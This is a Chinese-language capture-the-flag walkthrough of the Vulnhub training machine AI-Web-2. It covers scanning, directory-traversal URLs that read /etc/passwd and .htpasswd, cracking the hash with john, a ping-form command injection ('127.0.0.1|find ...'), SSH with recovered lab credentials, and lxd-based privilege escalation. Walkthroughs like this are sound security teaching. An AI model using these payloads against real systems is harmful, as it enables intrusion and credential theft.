看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web2

Vulnhub靶机Web2渗透测试详解

• • Vulnhub靶机介绍：
  • Vulnhub靶机下载：
  • Vulnhub靶机安装：
  • Vulnhub靶机漏洞详解：
  • • • ①：信息收集：
      • ②：目录穿越漏洞：
      • ③：命令执行漏洞：
      • ④：提权：
      • ⑤：获取flag：
  • Vulnhub靶机渗透总结：

Vulnhub靶机介绍：

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个Web的漏洞靶机，老样子需要找到flag即可。

Vulnhub靶机下载：

官网地址：https://download.vulnhub.com/aiweb/AI-Web-2.0.7z

Vulnhub靶机安装：

下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解：

①：信息收集：

kali里使用netdiscover发现主机

使用命令：nmap -sS -sV -A -n 192.168.0.105

发现开启了22端口和80端口 先访问一下80端口 注册一个账号登入一下，然后扫一下后台 dirb

②：目录穿越漏洞：

FileSharing 文件共享？？ 使用命令searchsploit 搜索一下相关漏洞 然后看一下漏洞怎么利用（目录穿越漏洞）

http://192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/passwd  ##利用漏洞看passwd

在/etc/passwd/下面发现了 两个用户 分别是 aiweb2 n0nr00tuser可能等下需要用到先放着 接着读取一下apache 文件

192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/apache2/sites-enabled/000-default.conf

http://192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd

新建一个pass.txt 把加密的复制进去aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/使用工具john 破解 发现 破解失败


后面才发现 给的提示有字典的名称:rockyou-45.txt 去github 上面找一个下载一下即可（这里没有外网 本机下载拖到kali）

字典链接：https://github.com/danielmiessler/SecLists/blame/master/Passwords/Leaked-Databases/rockyou-45.txt
得到账号密码：aiweb2admin/c.ronaldo

③：命令执行漏洞：

先登入一下后台，发现它给的提示的网络爬虫协议 访问一下http://192.168.0.105/webadmin/robots.txt

发现了两个路径分别是 /H05Tpin9555/ 和 /S0mextras/ 依次进行访问



这里访问第一个路径 /H05Tpin9555 存在一个ping的对话框 怀疑是命令 执行漏洞 第二个路径/S0mextras/下没有发现什么新东西。


使用命令：127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null 发现了个隐藏文件 可能是ssh 账号的密码文档 进行访问查看。


账号：n0nr00tuser 密码：zxowieoi4sdsadpEClDws1sf使用ssh登入 发现登入成功！！！

④：提权：

登入成功先看一下权限 使用命令：id ，uname -a cat /etc/os-release发现权限很低，先sudo -l 看一下 还是没有权限

使用命令：find / -perm -u=s -type f 2>/dev/null 查看二进制文件

使用命令searchsploit linux 18.04 搜一下相关版本看看系统有啥漏洞可以利用



查看利用.sh文件 第一步需要下载build-alpine ，第二步运行里面的build alpine然后给靶机运行就可以得到root

https://github.com/saghul/lxd-alpine-builder/

现在好了拖到kali里面 然后解压 运行./build-alpine 会下载一个apk的文件

然后ls一下会发现多了一个命名规则是年份日期的，然后把这个传到靶机中。

⑤：获取flag：

使用命令：find / –name flag*


至此获取到了flag，渗透测试结束。

Vulnhub靶机渗透总结：

①：了解了目录穿越漏洞（FileSharing）
②：命令执行漏洞需要 要多进行隐藏文件的收集（可以使用.）
③：信息收集后要学会 搜索相关漏洞并进行利用(Ubuntu 18.04)
④：注意权限的问题 很多时候没有权限是执行不了的 会提权失败（chmod 777）

这次是一个Web靶机的学习，希望大家也可以学习到新的一些知识点和一些渗透测试思路 最后祝大家五一假期快乐！！